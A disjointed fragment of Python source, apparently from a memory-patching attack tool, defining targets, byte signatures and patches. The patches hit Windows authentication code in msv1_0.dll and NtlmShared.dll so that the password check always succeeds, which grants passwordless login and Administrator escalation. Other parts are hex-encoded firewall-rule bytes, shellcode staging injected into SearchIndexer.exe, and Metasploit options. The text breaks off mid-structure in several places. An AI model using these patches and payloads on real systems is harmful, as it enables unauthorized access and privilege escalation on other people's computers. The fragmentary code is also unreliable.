# Target template targets = [ Target(name='find', note=None, signatures=[ Signature(os=None, os_versions=[], os_architectures=['x86', 'x64'], executable=None, version=None, md5=None, tag=False, offsets=[0x2a0], chunks=[ Chunk(chunk=0x9782440e1b5939ff, chunkoffset=0x00, patch=0x00, patchoffset=0x00) ]) ]), Target(name='findall', note=None, signatures=[ Signature(os=None, os_versions=[], os_architectures=['x86', 'x64'], executable=None, version=None, md5=None, tag=False, offsets=[0x031], chunks=[
note='Ensures that the password-check always returns true. This will ' 'cause all accounts to no longer require a password, and will ' 'also allow you to escalate privileges to Administrator via the ' '\'runas\' command.', signatures=[ Signature(os='Windows 10', os_versions=['10.0'], os_architectures=['x64'], executable='NtlmShared.dll', version=None, md5=None, tag=False, offsets=[0x14f], chunks=[ Chunk(chunk=0xc60f84, chunkoffset=0x00, patch=0xb001, patchoffset=0x07) ]) ]), Target( name='Windows 8 MsvpPasswordValidate unlock/privilege escalation', note='Ensures that the password-check always returns true. This will ' 'cause all accounts to no longer require a password, and will ' 'also allow you to escalate privileges to Administrator via the ' '\'runas\' command.', signatures=[ Signature(os='Windows 8', os_versions=['8.0'], os_architectures=['x86'], executable='msv1_0.dll', version=None,
b'\x44\x69\x72\x3d\x4f\x75\x74\x7c\x41\x70\x70\x3d\x25\x73' + b'\x79\x73\x74\x65\x6d\x44\x72\x69\x76\x65\x25\x5c\x57\x49' + b'\x4e\x44\x4f\x57\x53\x5c\x73\x79\x73\x74\x65\x6d\x33\x32' + b'\x5c\x53\x65\x61\x72\x63\x68\x49\x6e\x64\x65\x78\x65\x72' + b'\x2e\x65\x78\x65\x7c\x53\x76\x63\x3d\x57\x53\x65\x61\x72' + b'\x63\x68\x7c\x4e\x61\x6d\x65\x3d\x53\x65\x61\x72\x63\x68' + b'\x49\x6e\x64\x65\x78\x65\x72\x2d\x32\x7c\x22\x22\x00' } stage1 = Target(name='Allocate page', note='Create page, copy signature to it and jump to page', signatures=[ Signature(offsets=[0x18c], chunks=[ Chunk(chunk=0x8bff558bec813D, chunkoffset=0, patch=shellcode['alloc_page'], patchoffset=0) ], os='Windows 7', os_versions=['SP1'], os_architectures=['x86'], executable='SearchIndexer.exe', version='', md5='', tag=False) ]) def add_options(group): group.add_option('--msfopts', dest='msfopts',